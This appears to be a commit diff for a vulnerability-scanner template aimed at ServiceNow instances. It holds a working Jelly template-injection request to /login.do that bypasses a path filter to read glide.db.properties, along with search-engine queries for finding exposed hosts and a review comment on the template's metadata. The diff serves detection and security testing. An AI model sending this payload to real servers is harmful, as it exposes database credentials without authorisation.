minor-update
parent
dfdc32e3a1
commit
20cb50d9f3
|
@ -4,16 +4,42 @@ info:
|
|||
name: Service Now - Filesystem Filter Bypass
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
reference:
|
||||
- https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
|
||||
classification:
|
||||
cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: servicenow
|
||||
product: servicenow
|
||||
shodan-query:
|
||||
- http.favicon.hash:1701804003
|
||||
- http.title:"servicenow"
|
||||
fofa-query:
|
||||
- icon_hash=1701804003
|
||||
- title="servicenow"
|
||||
google-query: intitle:"servicenow"
|
||||
tags: cve,cve2024,servicenow,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
|
||||
GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'db.user'
|
||||
- "glide.db.user"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
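Review bot: The `tags:` line marks this template `cve,cve2024`, but the `classification:` block carries only a `cpe` and no `cve-id`, so a finding cannot be tied to an advisory when filtering or triaging by CVE; either add `cve-id: <CVE-ID-FROM-VENDOR-ADVISORY>` (placeholder, the page names none) or drop the two tags. The `info:` block also has no `description` or `remediation`, which is what an operator reads when the finding lands in a report; a line such as `description: Jelly template injection through jvar_page_title on /login.do allows a request without credentials to read glide.db.properties.` states only what the request and the `glide.db.user` matcher show. Because a match means the response body contains the instance's database connection settings, the description should say that stored responses and scan logs are to be handled as credential material. The `rce` tag looks broader than what this check demonstrates (a file read), so confirm it is intended.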